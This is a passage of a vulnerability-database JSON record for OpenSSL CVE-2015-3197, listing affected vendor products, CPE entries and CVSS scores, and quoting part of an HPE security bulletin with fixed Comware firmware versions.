"9.3-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.4" }, { "model": "unified intelligent contact management enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.1" }, { "model": "project openssl 1.0.1k", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3" }, { "model": "rational developer for aix and linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1.2" }, { "model": "telepresence", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "13100" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.2" }, { "model": "linux -current", "scope": null, "trust": 0.3, "vendor": "slackware", "version": null }, { "model": "project openssl 1.0.1b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "pureapplication system", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.1.2.2" }, { "model": "watson explorer foundational components", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0.0.0" }, { "model": "powerkvm build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.165.1" }, { "model": "telepresence conductor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "image construction and composition tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.2.0" }, { "model": "series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88000" }, { "model": "smartcloud entry appliance fixpac", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "project openssl 1.0.1s", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "pureapplication system if", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.0.0.18" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "6" }, { "model": "sun blade ethernet switched nem 24p 10ge", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "60001.2" }, { "model": "infosphere master data management standard/advanced edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.4" }, { "model": "cognos tm1 interim fix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.2.0.2" }, { "model": "10.1-release-p23", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-release-p16", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "business process manager standard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.6" }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.0" }, { "model": "unified communications manager session management edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "9.3-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "powerkvm build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.165.5" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "9.3-release-p9", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl 1.0.2c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "mq light client module for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.2014090801" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.12" }, { "model": "rational developer for aix and linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "powerkvm sp1", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-320" }, { "model": "unified attendant console enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified contact center express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cognos insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.0" }, { "model": "watson explorer foundational components", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.0" }, { "model": "project openssl 1.0.2b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "powerkvm build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.1.165.7" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.1" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.8" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.3.0" }, { "model": "9.3-release-p34", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "emergency responder", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "flex system chassis management module 2pet", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.2" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-370" }, { "model": "cloud manager with openstack interim fix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.2.0.3" }, { "model": "nexus", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "project openssl 1.0.1l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "im and presence service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "5.0.16" }, { "model": "9.3-release-p29", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "cognos insight fp if", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.2.126" }, { "model": "vm server for", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "x863.2" }, { "model": "tivoli provisioning manager for images system edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x7.1.1.0" }, { "model": "unity connection", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.1" }, { "model": "project openssl 1.0.1h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "powerkvm build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.158" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0.1" }, { "model": "project openssl 1.0.1p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "unified computing system central software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.2" }, { "model": "unified computing system central software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.1" }, { "model": "unified computing system central software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.0" } ], "sources": [ { "db": "CERT/CC", "id": "VU#257823" }, { "db": "BID", "id": "82237" }, { "db": "BID", "id": "74491" }, { "db": "JVNDB", "id": "JVNDB-2015-006985" }, { "db": "CNNVD", "id": "CNNVD-201602-026" }, { "db": "NVD", "id": "CVE-2015-3197" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:tuxedo:12.1.1.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:exalogic_infrastructure:1.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:exalogic_infrastructure:2.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.54:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.53:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.55:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:beta3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1p:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1n:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1q:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1o:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:oss_support_tools:8.11.16.3.8:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:vm_virtualbox:5.0.16:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2015-3197" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Nimrod Aviram and Sebastian Schinzel", "sources": [ { "db": "BID", "id": "82237" }, { "db": "CNNVD", "id": "CNNVD-201602-026" } ], "trust": 0.9 }, "cve": "CVE-2015-3197", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Medium", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "None", "baseScore": 4.3, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "CVE-2015-3197", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "HIGH", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "exploitabilityScore": 2.2, "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0" }, { "attackComplexity": "High", "attackVector": "Network", "author": "NVD", "availabilityImpact": "None", "baseScore": 5.9, "baseSeverity": "Medium", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "CVE-2015-3197", "impactScore": null, "integrityImpact": "None", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0" } ], "severity": [ { "author": "NVD", "id": "CVE-2015-3197", "trust": 1.8, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201602-026", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2015-3197", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-3197" }, { "db": "JVNDB", "id": "JVNDB-2015-006985" }, { "db": "CNNVD", "id": "CNNVD-201602-026" }, { "db": "NVD", "id": "CVE-2015-3197" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "ssl/s2_srvr.c in OpenSSL 1.0.1 before 1.0.1r and 1.0.2 before 1.0.2f does not prevent use of disabled ciphers, which makes it easier for man-in-the-middle attackers to defeat cryptographic protection mechanisms by performing computations on SSLv2 traffic, related to the get_client_master_key and get_client_hello functions. OpenSSL may generate unsafe primes for use in the Diffie-Hellman protocol, which may lead to disclosure of enough information for an attacker to recover the private encryption key. OpenSSL is prone to a security-bypass vulnerability. \nSuccessfully exploiting this issue may allow attackers to perform unauthorized actions. This may lead to other attacks. Cisco Unified Computing System Central Software is prone to an arbitrary command-execution vulnerability. \nAn attacker can exploit this issue to execute system commands on the underlying operating system. \nThis issue being tracked by Cisco Bug ID CSCut46961. Description:\n\nRed Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. It is comprised of the\nApache HTTP Server, the Apache Tomcat Servlet container, Apache Tomcat\nConnector(mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and\nthe Tomcat Native library. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05390893\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c05390893\nVersion: 1\n\nHPESBHF03703 rev.1 - HPE Network Products including Comware v7 and VCX using\nOpenSSL, Remote Unauthorized Disclosure of Information\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2017-02-14\nLast Updated: 2017-02-14\n\nPotential Security Impact: Remote: Unauthorized Disclosure of Information\n\nSource: Hewlett Packard Enterprise, Product Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities with OpenSSL have been addressed in HPE\nNetwork Products including Comware v7 and VCX. The vulnerabilities could be\nremotely exploited resulting in disclosure of information. \n\nReferences:\n\n - CVE-2015-3197 - OpenSSL, Remote unauthorized disclosure of information\n - CVE-2016-0701 - OpenSSL, Remote unauthorized disclosure of information\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\n - VCX Products all prior versions - impacted by CVE-2015-3197 only. Please\nrefer to the RESOLUTION below for a list of updated products. \n - Comware 7 (CW7) Products all prior versions - impacted by CVE-2015-3197\nand CVE-2016-0701. Please refer to the RESOLUTION below for a list of updated\nproducts. \n\nBACKGROUND\n\n CVSS Base Metrics\n =================\n Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector\n\n CVE-2015-3197\n 5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)\n\n CVE-2016-0701\n 3.7 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N\n 2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N)\n\n Information on CVSS is documented in\n HPE Customer Notice HPSN-2008-002 here:\n\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499\n\nRESOLUTION\n\nHPE has made the following software updates to resolve the vulnerability in\nthe Comware v7 and VCX products. \n\n**COMWARE 7 Products**\n\n + **12500 (Comware 7) - Version: R7377P01**\n * HP Network Products\n - JC072B HP 12500 Main Processing Unit\n - JC085A HP A12518 Switch Chassis\n - JC086A HP A12508 Switch Chassis\n - JC652A HP 12508 DC Switch Chassis\n - JC653A HP 12518 DC Switch Chassis\n - JC654A HP 12504 AC Switch Chassis\n - JC655A HP 12504 DC Switch Chassis\n - JF430A HP A12518 Switch Chassis\n - JF430B HP 12518 Switch Chassis\n - JF430C HP 12518 AC Switch Chassis\n - JF431A HP A12508 Switch Chassis\n - JF431B HP 12508 Switch Chassis\n - JF431C HP 12508 AC Switch Chassis\n - JG497A HP 12500 MPU w/Comware V7 OS\n - JG782A HP FF 12508E AC Switch Chassis\n - JG783A HP FF 12508E DC Switch Chassis\n - JG784A HP FF 12518E AC Switch Chassis\n - JG785A HP FF 12518E DC Switch Chassis\n - JG802A HP FF 12500E MPU\n * CVEs\n - CVE-2015-3197\n - CVE-2016-0701\n + **10500 (Comware 7) - Version: R7183**\n * HP Network Products\n - JC611A HP 10508-V Switch Chassis\n - JC612A HP 10508 Switch Chassis\n - JC613A HP 10504 Switch Chassis\n - JC748A HP 10512 Switch Chassis\n - JG608A HP FlexFabric 11908-V Switch Chassis\n - JG609A HP FlexFabric 11900 Main Processing Unit\n - JG820A HP 10504 TAA Switch Chassis\n - JG821A HP 10508 TAA Switch Chassis\n - JG822A HP 10508-V TAA Switch Chassis\n - JG823A HP 10512 TAA Switch Chassis\n - JG496A HP 10500 Type A MPU w/Comware v7 OS\n - JH198A HP 10500 Type D Main Processing Unit with Comware v7 Operating\nSystem\n - JH206A HP 10500 Type D TAA-compliant with Comware v7 Operating System\nMain Processing Unit\n * CVEs\n - CVE-2015-3197\n - CVE-2016-0701\n + **12900 (Comware 7) - Version: R1150**\n * HP Network Products\n - JG619A HP FlexFabric 12910 Switch AC Chassis\n - JG621A HP FlexFabric 12910 Main Processing Unit\n - JG632A HP FlexFabric 12916 Switch AC Chassis\n - JG634A HP FlexFabric 12916 Main Processing Unit\n - JH104A HP FlexFabric 12900E Main Processing Unit\n - JH114A HP FlexFabric 12910 TAA-compliant Main Processing Unit\n - JH263A HP FlexFabric 12904E Main Processing Unit\n - JH255A HP FlexFabric 12908E Switch Chassis\n - JH262A HP FlexFabric 12904E Switch Chassis\n - JH113A HP FlexFabric 12910 TAA-compliant Switch AC Chassis\n - JH103A HP FlexFabric 12916E Switch Chassis\n * CVEs\n - CVE-2015-3197\n - CVE-2016-0701\n + **5900 (Comware 7) - Version: R2432P01**\n * HP Network Products\n - JC772A HP 5900AF-48XG-4QSFP+ Switch\n - JG296A HP 5920AF-24XG Switch\n - JG336A HP 5900AF-48XGT-4QSFP+ Switch\n - JG510A HP 5900AF-48G-4XG-2QSFP+ Switch\n - JG554A HP 5900AF-48XG-4QSFP+ TAA Switch\n - JG555A HP 5920AF-24XG TAA Switch\n - JG838A HP FF 5900CP-48XG-4QSFP+ Switch\n - JH036A HP FlexFabric 5900CP 48XG 4QSFP+ TAA-Compliant\n - JH037A HP 5900AF 48XGT 4QSFP+ TAA-Compliant Switch\n - JH038A HP 5900AF 48G 4XG 2QSFP+ TAA-Compliant\n * CVEs\n - CVE-2015-3197\n - CVE-2016-0701\n + **MSR1000 (Comware 7) - Version: R0306P30**\n * HP Network Products\n - JG875A HP MSR1002-4 AC Router\n - JH060A HP MSR1003-8S AC Router\n * CVEs\n - CVE-2015-3197\n - CVE-2016-0701\n + **MSR2000 (Comware 7) - Version: R0306P30**\n * HP Network Products\n - JG411A HP MSR2003 AC Router\n - JG734A HP MSR2004-24 AC Router\n - JG735A HP MSR2004-48 Router\n - JG866A HP MSR2003 TAA-compliant AC Router\n * CVEs\n - CVE-2015-3197\n - CVE-2016-0701\n + **MSR3000 (Comware 7) - Version: R0306P30**\n * HP Network Products\n - JG404A HP MSR3064 Router\n - JG405A HP MSR3044 Router\n - JG406A HP MSR3024 AC Router\n - JG409A HP MSR3012 AC Router\n - JG409B HPE MSR3012 AC Router\n - JG861A HP MSR3024 TAA-compliant AC Router\n * CVEs\n - CVE-2015-3197\n - CVE-2016-0701\n + **MSR4000 (Comware 7) - Version: R0306P30**\n * HP Network Products\n - JG402A HP MSR4080 Router Chassis\n - JG403A HP MSR4060 Router Chassis\n - JG412A HP MSR4000 MPU-100 Main Processing Unit\n - JG869A HP MSR4000 TAA-compliant MPU-100 Main Processing Unit\n * CVEs\n - CVE-2015-3197\n - CVE-2016-0701\n + **MSR95X - Version: R0306P30**\n * HP Network Products\n - JH296A HPE MSR954 1GbE SFP 2GbE-WAN 4GbE-LAN CWv7 Router\n - JH297A HPE MSR954-W 1GbE SFP (WW) 2GbE-WAN 4GbE-LAN Wireless 802.11n\nCWv7 Router\n - JH298A HPE MSR954-W 1GbE SFP LTE (AM) 2GbE-WAN 4GbE-LAN Wireless\n802.11n CWv7 Router\n - JH299A HPE MSR954-W 1GbE SFP LTE (WW) 2GbE-WAN 4GbE-LAN Wireless\n802.11n CWv7 Router\n * CVEs\n - CVE-2015-3197\n - CVE-2016-0701\n + **VSR (Comware 7) - Version: E0322P01**\n * HP Network Products\n - JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation\nSoftware\n - JG811AAE HP VSR1001 Comware 7 Virtual Services Router\n - JG812AAE HP VSR1004 Comware 7 Virtual Services Router\n - JG813AAE HP VSR1008 Comware 7 Virtual Services Router\n * CVEs\n - CVE-2015-3197\n - CVE-2016-0701\n + **7900 (Comware 7) - Version: R2150**\n * HP Network Products\n - JG682A HP FlexFabric 7904 Switch Chassis\n - JG841A HP FlexFabric 7910 Switch Chassis\n - JG842A HP FlexFabric 7910 7.2Tbps Fabric / Main Processing Unit\n - JH001A HP FlexFabric 7910 2.4Tbps Fabric / Main Processing Unit\n - JH122A HP FlexFabric 7904 TAA-compliant Switch Chassis\n - JH123A HP FlexFabric 7910 TAA-compliant Switch Chassis\n - JH124A HP FlexFabric 7910 7.2Tbps TAA-compliant Fabric/Main\nProcessing Unit\n - JH125A HP FlexFabric 7910 2.4Tbps TAA-compliant Fabric/Main\nProcessing Unit\n * CVEs\n - CVE-2015-3197\n - CVE-2016-0701\n + **5130EI (Comware 7) - Version: R3113P02**\n * HP Network Products\n - JG932A HP 5130-24G-4SFP+ EI Switch\n - JG933A HP 5130-24G-SFP-4SFP+ EI Switch\n - JG934A HP 5130-48G-4SFP+ EI Switch\n - JG936A HP 5130-24G-PoE+-4SFP+ (370W) EI Switch\n - JG937A HP 5130-48G-PoE+-4SFP+ (370W) EI Switch\n - JG938A HP 5130-24G-2SFP+-2XGT EI Switch\n - JG939A HP 5130-48G-2SFP+-2XGT EI Switch\n - JG940A HP 5130-24G-PoE+-2SFP+-2XGT (370W) EI Switch\n - JG941A HP 5130-48G-PoE+-2SFP+-2XGT (370W) EI Switch\n - JG975A HP 5130-24G-4SFP+ EI Brazil Switch\n - JG976A HP 5130-48G-4SFP+ EI Brazil Switch\n - JG977A HP 5130-24G-PoE+-4SFP+ (370W) EI Brazil Switch\n - JG978A HP 5130-48G-PoE+-4SFP+ (370W) EI Brazil Switch\n * CVEs\n - CVE-2015-3197\n - CVE-2016-0701\n + **6125XLG - Version: R2432P01**\n * HP Network Products\n - 711307-B21 HP 6125XLG Blade Switch\n - 737230-B21 HP 6125XLG Blade Switch with TAA\n * CVEs\n - CVE-2015-3197\n - CVE-2016-0701\n + **6127XLG - Version: R2432P01**\n * HP Network Products\n - 787635-B21 HP 6127XLG Blade Switch Opt Kit\n - 787635-B22 HP 6127XLG Blade Switch with TAA\n * CVEs\n - CVE-2015-3197\n - CVE-2016-0701\n + **Moonshot - Version: R2432P01**\n * HP Network Products\n - 786617-B21 - HP Moonshot-45Gc Switch Module\n - 704654-B21 - HP Moonshot-45XGc Switch Module\n - 786619-B21 - HP Moonshot-180XGc Switch Module\n * CVEs\n - CVE-2015-3197\n - CVE-2016-0701\n + **5700 (Comware 7) - Version: R2432P01**\n * HP Network Products\n - JG894A HP FlexFabric 5700-48G-4XG-2QSFP+ Switch\n - JG895A HP FlexFabric 5700-48G-4XG-2QSFP+ TAA-compliant Switch\n - JG896A HP FlexFabric 5700-40XG-2QSFP+ Switch\n - JG897A HP FlexFabric 5700-40XG-2QSFP+ TAA-compliant Switch\n - JG898A HP FlexFabric 5700-32XGT-8XG-2QSFP+ Switch\n - JG899A HP FlexFabric 5700-32XGT-8XG-2QSFP+ TAA-compliant Switch\n * CVEs\n - CVE-2015-3197\n - CVE-2016-0701\n + **5930 (Comware 7) - Version: R2432P01**\n * HP Network Products\n - JG726A HP FlexFabric 5930 32QSFP+ Switch\n - JG727A HP FlexFabric 5930 32QSFP+ TAA-compliant Switch\n - JH178A HP FlexFabric 5930 2QSFP+ 2-slot Switch\n - JH179A HP 